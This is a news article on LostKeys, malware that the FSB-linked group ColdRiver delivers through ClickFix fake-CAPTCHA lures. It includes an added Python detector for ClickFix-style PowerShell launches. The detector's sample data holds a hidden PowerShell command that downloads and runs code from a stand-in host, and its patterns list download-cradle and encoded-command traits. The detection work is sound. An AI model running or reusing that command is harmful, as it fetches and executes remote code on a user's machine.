Google has announced (through Android Headlines) the discovery of a new malware known as LostKeys, utilized by the hacking collective ColdRiver, which has ties to the Russian FSB. This software is designed to steal files and system data from Western organizations.
According to the Google Threat Intelligence Group (GTIG), LostKeys is employed in targeted ClickFix attacks that leverage social engineering tactics, starting with a counterfeit CAPTCHA. Victims are tricked into executing malicious PowerShell scripts that pave the way for downloading and executing additional harmful software. The main objective is the installation of LostKeys, which operates as a digital vacuum, extracting files, directories, and system information. Hackers also utilize other malicious programs, including SPICA, to gain access to documents.
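As an added example (not code from Google's report or from this article), the following Python detector runs over constructed Sysmon-style process-creation records and flags the ClickFix pattern described above: a shell spawned by explorer.exe (as happens when a user pastes a "verification" command into the Run dialog) together with hidden-window, encoded-command or download-cradle switches. The field names, thresholds and sample records are assumptions, not indicators from the report.

```python
"""Heuristic detection of ClickFix-style PowerShell launches (added example)."""
import re

# Assumption: records mimic Sysmon Event ID 1 (process creation) fields.
USER_LAUNCH_PARENTS = {"explorer.exe"}  # Win+R / address-bar launches
SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Each pattern is a command-line trait commonly paired with user-pasted lures.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile",
                re.I), "download cradle"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "noprofile"),
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation record."""
    if _basename(event.get("Image", "")) not in SHELLS:
        return 0, []
    reasons = []
    if _basename(event.get("ParentImage", "")) in USER_LAUNCH_PARENTS:
        reasons.append("shell spawned by explorer.exe (Win+R style launch)")
    cmd = event.get("CommandLine", "")
    reasons += [label for pattern, label in SUSPICIOUS_PATTERNS if pattern.search(cmd)]
    return len(reasons), reasons


def flag_clickfix(events: list[dict], threshold: int = 2) -> list[dict]:
    """Keep only records whose score reaches the threshold (assumed default: 2)."""
    hits = []
    for e in events:
        score, reasons = score_event(e)
        if score >= threshold:
            hits.append({"pid": e["ProcessId"], "score": score, "reasons": reasons})
    return hits


# Constructed sample records: one lure-style launch, one benign build, one non-shell.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/verify).Content"'},
    {"ProcessId": 5210, "ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
    {"ProcessId": 6011, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for hit in flag_clickfix(SAMPLE_EVENTS):
        print(hit)
```

Tune the parent list and threshold to your environment; the explorer.exe parent alone is common for legitimate shortcut launches, so it only contributes one point.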
The ColdRiver group has been active since 2017 and is also known by names such as Star Blizzard and Callisto Group. Reports indicate that it has intensified its operations in recent years, particularly following Russia's invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and NGOs.
The United States has already imposed sanctions against specific group members and announced a reward of $10 million for information leading to their arrest.
Google experts emphasize the necessity of enhancing cybersecurity measures, especially for organizations that may become potential targets of ColdRiver attacks. They recommend employing Google's advanced protection and regularly updating security systems to prevent such threats.